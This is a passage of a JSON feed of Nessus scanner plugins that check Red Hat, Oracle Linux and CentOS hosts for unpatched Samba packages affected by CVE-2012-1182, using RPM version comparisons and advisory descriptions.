(rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-common-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-debuginfo-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-debuginfo-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-winbind-clients-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-winbind-devel-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:53:33", "description": "Description of changes:\n\n[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : samba (ELSA-2012-0478)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:samba", "p-cpe:/a:oracle:linux:samba-client", "p-cpe:/a:oracle:linux:samba-common", "p-cpe:/a:oracle:linux:samba-swat", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2012-0478.NASL", "href": "https://www.tenable.com/plugins/nessus/68512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2012-0478.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68512);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n\n script_name(english:\"Oracle Linux 4 : samba (ELSA-2012-0478)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002755.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"samba-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-client-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-common-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-swat-3.0.33-3.36.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-client / samba-common / samba-swat\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:44", "description": "Updated samba3x packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "CentOS 5 : samba3x (CESA-2012:0466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba3x", "p-cpe:/a:centos:centos:samba3x-client", "p-cpe:/a:centos:centos:samba3x-common", "p-cpe:/a:centos:centos:samba3x-doc", "p-cpe:/a:centos:centos:samba3x-domainjoin-gui", "p-cpe:/a:centos:centos:samba3x-swat", "p-cpe:/a:centos:centos:samba3x-winbind", "p-cpe:/a:centos:centos:samba3x-winbind-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2012-0466.NASL", "href": "https://www.tenable.com/plugins/nessus/58664", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0466 and \n# CentOS Errata and Security Advisory 2012:0466 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58664);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0466\");\n\n script_name(english:\"CentOS 5 : samba3x (CESA-2012:0466)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba3x packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6\nExtended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018561.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cf7e1c06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba3x packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-doc / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:44", "description": "Updated samba packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 : samba (CESA-2012:0465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libsmbclient", "p-cpe:/a:centos:centos:libsmbclient-devel", "p-cpe:/a:centos:centos:samba", "p-cpe:/a:centos:centos:samba-client", "p-cpe:/a:centos:centos:samba-common", "p-cpe:/a:centos:centos:samba-doc", "p-cpe:/a:centos:centos:samba-domainjoin-gui", "p-cpe:/a:centos:centos:samba-swat", "p-cpe:/a:centos:centos:samba-winbind", "p-cpe:/a:centos:centos:samba-winbind-clients", "p-cpe:/a:centos:centos:samba-winbind-devel", "p-cpe:/a:centos:centos:samba-winbind-krb5-locator", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/58663", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0465 and \n# CentOS Errata and Security Advisory 2012:0465 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58663);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"CentOS 5 / 6 : samba (CESA-2012:0465)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0d314040\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e85d5c5a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 